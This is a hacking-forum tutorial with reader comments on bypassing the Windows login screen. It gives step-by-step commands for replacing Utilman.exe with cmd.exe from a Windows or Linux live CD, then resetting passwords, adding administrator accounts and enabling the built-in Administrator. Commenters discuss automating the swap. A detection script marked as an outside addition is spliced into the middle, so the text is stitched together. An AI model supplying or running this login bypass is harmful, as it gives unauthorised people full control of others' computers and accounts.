How To: Reset Windows Password with a Windows CD or a Linux CD

Hello everyone!

I'm glad to post my first tutorial and hope you will appreciate it.
I'm a beginner in hacking, so I don't have a lot to teach you, but maybe this tutorial will help some of you.
And sorry for my limited English... I do my best.

In this tutorial I will show you how to access cmd.exe from the login screen.

You can do a lot of things with cmd.exe, but here it will mainly be used to reset a user's password, create a new user with admin rights, or enable the built-in Administrator account.

On Windows there is a file called Utilman.exe. It is the Ease of Access tool: it can narrate text, zoom the screen, show an on-screen keyboard, etc.

This tool can be launched from the login screen with Windows + U.
We will replace this file with cmd.exe, so that pressing Windows + U launches the command prompt instead.

I learned this tip from this tutorial, but it's in French, so I'd like to share it with the Null Byte community.

Note that it works on Windows XP, Vista, 7, 8, 8.1 and 10.

Step 1: Using a Windows CD

Obviously, you need the Windows installation CD corresponding to the Windows version you want to hack.
For the example I use Windows 7, but it's basically the same on every version.

  • First, boot from the CD (I think I don't need to teach you how to do that).
  • Click "Next" -> "Repair your computer" -> select your OS -> "Command Prompt"

If you get a command prompt, all is OK.

First we go to the main partition. On a running system the main partition is usually C:\, but when booted from the CD it's often D:\. To be sure, use the dir command to check that you're on the right partition.

Use this command to switch to a partition (here, the D:\ partition):

  • d:

Go to Windows\System32:

  • cd Windows\System32

Now create a backup of Utilman.exe so we can restore it later:

  • copy Utilman.exe Utilman.bak

Finally, replace Utilman.exe with cmd.exe (copy cmd.exe under the name Utilman.exe):

  • copy cmd.exe Utilman.exe

Type "y" when asked to confirm the overwrite.

Now restart the computer to get to the Windows login screen. Step 3 explains how to reset a password.

When you are done, restore Utilman.exe:

  • Boot from the CD
  • Click "Next" -> "Repair your computer" -> select your OS -> "Command Prompt"
  • d:
  • cd Windows\System32
  • del Utilman.exe
  • ren Utilman.bak Utilman.exe

Step 2: Using a Linux Live CD

The advantage of a Linux CD is that it works on every Windows version; you don't need the installation CD for the specific Windows version.

It's exactly the same procedure, but the command names are a little different.

  • Boot from your CD
  • Open a terminal

First we need to find out which partition is the Windows partition:

  • fdisk -l

In the example output, sda3 is labelled "Microsoft basic data" with a size of 213.3 GB, so we can easily deduce that it's the Windows partition.

Here are the commands to mount the partition and replace Utilman.exe with cmd.exe (the mount point has to exist, so create it first):

  • mkdir -p /mnt/sda3
  • mount /dev/sda3 /mnt/sda3
  • cd /mnt/sda3/Windows/System32
  • mv Utilman.exe Utilman.bak
  • cp cmd.exe Utilman.exe

And to restore Utilman.exe:

  • rm Utilman.exe
  • mv Utilman.bak Utilman.exe
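The other side of Steps 1 and 2, as an added example that is not part of this tutorial: an integrity check an administrator or incident responder can run from the same kind of Linux live or forensic system to find out whether Utilman.exe on a Windows volume has been swapped for a copy of cmd.exe, or whether a leftover Utilman.bak shows that it was swapped and put back. It assumes the volume is already mounted read-only at the path you pass (the tutorial's /dev/sda3 and /mnt/sda3 are reused as example values), that coreutils sha256sum or BSD shasum is available, and the function names check_utilman, find_one and sha256_of are my own.

```shell
#!/bin/sh
# Added example, not from the tutorial: report whether Utilman.exe under a
# mounted Windows volume is byte-identical to cmd.exe (the swap described in
# Steps 1 and 2) or whether a Utilman.bak backup was left behind.
# Mount the volume read-only first, e.g.:  mount -o ro /dev/sda3 /mnt/sda3
#
# Usage: check_utilman /mnt/sda3
# Exit status: 0 = Utilman.exe looks intact, 1 = tampering indicators found,
#              2 = Windows/System32 or the expected files were not found.

sha256_of() {
    # Portable SHA-256 of one file (GNU coreutils, or BSD/macOS shasum fallback)
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

find_one() {
    # $1 = directory, $2 = file name. Case-insensitive, because NTFS names are
    # case-insensitive on Windows but case-sensitive once mounted on Linux.
    find "$1" -maxdepth 1 -type f -iname "$2" 2>/dev/null | head -n 1
}

check_utilman() {
    root="$1"
    sys32=$(find "$root" -maxdepth 2 -type d -ipath '*/windows/system32' 2>/dev/null | head -n 1)
    if [ -z "$sys32" ]; then
        echo "$root: no Windows/System32 directory found" >&2
        return 2
    fi
    utilman=$(find_one "$sys32" utilman.exe)
    cmdexe=$(find_one "$sys32" cmd.exe)
    if [ -z "$utilman" ] || [ -z "$cmdexe" ]; then
        echo "$sys32: Utilman.exe or cmd.exe is missing" >&2
        return 2
    fi
    status=0
    # A genuine Utilman.exe never has the same content as cmd.exe
    if [ "$(sha256_of "$utilman")" = "$(sha256_of "$cmdexe")" ]; then
        echo "TAMPERED: $utilman is byte-identical to $cmdexe"
        status=1
    fi
    # The tutorial's restore steps delete this file; finding it means the
    # swap happened and nobody cleaned up properly
    bak=$(find_one "$sys32" utilman.bak)
    if [ -n "$bak" ]; then
        echo "SUSPICIOUS: leftover backup $bak next to Utilman.exe"
        status=1
    fi
    [ "$status" -eq 0 ] && echo "OK: $utilman does not match cmd.exe"
    return "$status"
}

# Check every volume root given on the command line
if [ $# -gt 0 ]; then
    for root in "$@"; do
        check_utilman "$root"
    done
fi
```

The hash comparison only catches the exact copy the tutorial makes; for a broader check, compare Utilman.exe against the hash of a known-good copy from install media, or on a running Windows system run sfc /verifyonly, which validates protected system files against their known versions.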

Step 3: At the Login Menu

When you're at the login screen, press Windows + U and the command prompt should appear.
Here are some useful commands:

To change a user's password:

  • net user "username" "newPassword"

To create a new user with admin rights:

  • net user "newUser" "password" /add
  • net localgroup Administrators "newUser" /add

To enable the built-in Administrator account and set its password:

  • net user administrator /active:yes
  • net user administrator "newPassword"

There are certainly many other useful commands, but I'll let your imagination find them.

Thank you for reading this tutorial; don't hesitate to give me your feedback, it will be really helpful for me!

10 Comments

Hey,
Nice tutorial.
I used this method some years ago to get access to my own device :D

I've always wondered if there is an easy way to automate the commands.
Just typing everything with a ; in the terminal?
mount /dev/sda3 /mnt/sda3;
cd /mnt/sda3/Windows/System32;
mv Utilman.exe Utilman.bak;
cp cmd.exe Utilman.exe;

or creating a script or something like that?
Any Linux expert here who has a good idea?

Cheers

You could script it to automatically mount each partition and check for the presence of windows/system32/utilman.exe, and do the magic only on the right one.

Also, your one-liner works; you could use && instead of ; so that each command executes only if the previous operation returned 0. But after mounting there should be no problem copying and renaming, so ; will do.

Nice tutorial btw, thanks Madness.

Ok thanks ;)
Improved my Linux skills a bit ;)
One more question:

Let's talk about a one-liner for the update process in Kali.
(Sorry if it's a bit off-topic)

I would use this:
apt-get update && apt-get upgrade

but if there's an update where you have to confirm with "J"
(had it today when updating Iceweasel),
the update process stops and waits for my confirmation.
Any great way to solve this?

Cheers

From man apt-get:

-y, --yes, --assume-yes
Automatic yes to prompts; assume "yes" as answer to all prompts and
run non-interactively. If an undesirable situation, such as
changing a held package, trying to install a unauthenticated
package or removing an essential package occurs then apt-get will
abort. Configuration Item: APT::Get::Assume-Yes.

so

apt-get update && apt-get -y upgrade

should do

Oh damn, I just had to take a look inside the apt-get manual :D
Anyway, thanks a lot man, it helped me a lot :)

Cheers

Yeah, man pages or --help flags usually answer most questions... anyway, you're welcome.

I don't know a lot of tools that work on every version of Windows.

And I like this method because you can do it with a Linux live CD; you don't need to burn a CD or a USB stick with another program.

I used to work with Kon-Boot, but the free version only worked for a limited number of Windows versions.
I think this is the best way to get easy and fast access ;)
However, I'd be happy to be proven wrong :)

Cheers

Thanks for sharing! I like that "net user Administrator /active:yes" command. It allows access without changing the passwords of the other accounts.
